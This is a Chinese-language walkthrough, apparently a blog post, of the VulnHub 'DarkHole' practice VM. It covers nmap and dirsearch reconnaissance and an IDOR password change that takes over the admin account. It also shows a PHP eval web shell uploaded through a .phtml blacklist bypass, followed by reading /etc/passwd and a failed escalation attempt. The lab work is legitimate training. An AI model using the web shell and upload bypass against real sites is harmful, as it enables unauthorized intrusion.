vulhub DarkHole【靶场复现】

下载链接:

https://download.vulnhub.com/darkhole/DarkHole.zip

下载完成:

image.png

解压:

image.png

环境搭建

在虚拟机导航栏–》右键点击打开–》选择刚才解压后的文件–》打开
image.png
image.png

搭建完成:

image.png

信息收集

靶机搭建好了,现在什么都不知道,我们应该先找到该靶机的ip地址(类似真实攻防,你总的有个目标)

收集靶机网络模式与MAC地址

1.在虚拟机中,点击靶机右键设置
2.查看网络适配器,查看该靶机的网络模式,记住下一步要用
3.点击高级,查看该靶机的MAC地址,一样的记住下二步要用
(截图敲错字了,NAT)
image.png

查看NAT网络模式分配的ip地址段

虚拟机导航栏–》编辑–》虚拟网络编辑器–》更改设置
选择NAT模式–》然后就可以看见该模式下分配的ip地址段,靶机也是该模式,所以靶机的地址就是该地址段中的一个
image.png
image.png

打开kali扫描主机

点击kali右键设置–》点击网络配置器–》切换为NAT模式–》点击确定
image.png
查看kali在NAT模式下分配的地址
image.png
nmap扫描NAT模式下,该网段的存活主机
扫描结果肯定不止一个
利用之前查看的靶机MAC地址,做对比找出靶机ip

nmap 192.168.3.0/24			//扫描网段

image.png

kali扫描端口

知道了ip,不知道靶机开放了什么服务
所以扫描端口

nmap 192.168.3.131 -p- 				//扫描全端口

image.png

浏览访问

正常页面
image.png

showtime

kali目录扫描

dirsearch -u "http://192.168.3.131/"

image.png

拼接路径访问查看相关页面

应该是个文件上传后的功能点
image.png
禁止访问,太妙了
image.png
点了没啥反应
image.png
js文件(应该属于敏感信息泄露吧?看过了,没啥东西)
image.png
登录注册框
image.png
上传图片的
image.png

利用登录框

尝试弱口令登录
登录失败
image.png
注册账号
注册时可以尝试注册admin账号,提示用户已注册,代表该网站中存在admin用户
另注册一个账号,登录
只有一个修改密码的功能,抓包测试逻辑漏洞,看是否可以修改admin的密码image.png

逻辑漏洞修改密码

image.png
image.png
发送到repeater模块,修改id值发包
image.png

退出登录,切换admin用户,登录后台

image.png
登录后台,多一个文件上传功能

image.png文件上传getshell

直接上传php一句话文件

<?php @eval($_POST['cmd']); ?>

image.png
没成功,有格式限制
通过测试找到了黑名单的漏网之鱼.phtml后缀并没有进行限制

判断黑白名单成功getshell

文件后缀有限制,文件名后缀写一个完全不存在的后缀名,如果是黑名单,就可以上传成功,如果是白名单,就无法上传.
文件上传漏洞时,一般都是找黑名单的
image.png
提示上传成功,点击file访问上传的的文件,复制链接,蚁剑连接
image.png
添加该数据–》右键虚拟终端
image.png

提权

现在用户是www-data接下来要做的就是提权到root
查看敏感文件找到存在可以提权的用户

cat /etc/passwd | grep /bin/bash

image.png
去john用户家目录看看能不能找到有用的信息

cd /home/join			//进入用户家目录
ls -l			//查看当前目录列表详细信息

image.png
没提权成功擦,你们看看大佬的
https://www.rstk.cn/news/1127100.html?action=onClick
https://blog.csdn.net/qq_18980147/article/details/127145582

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值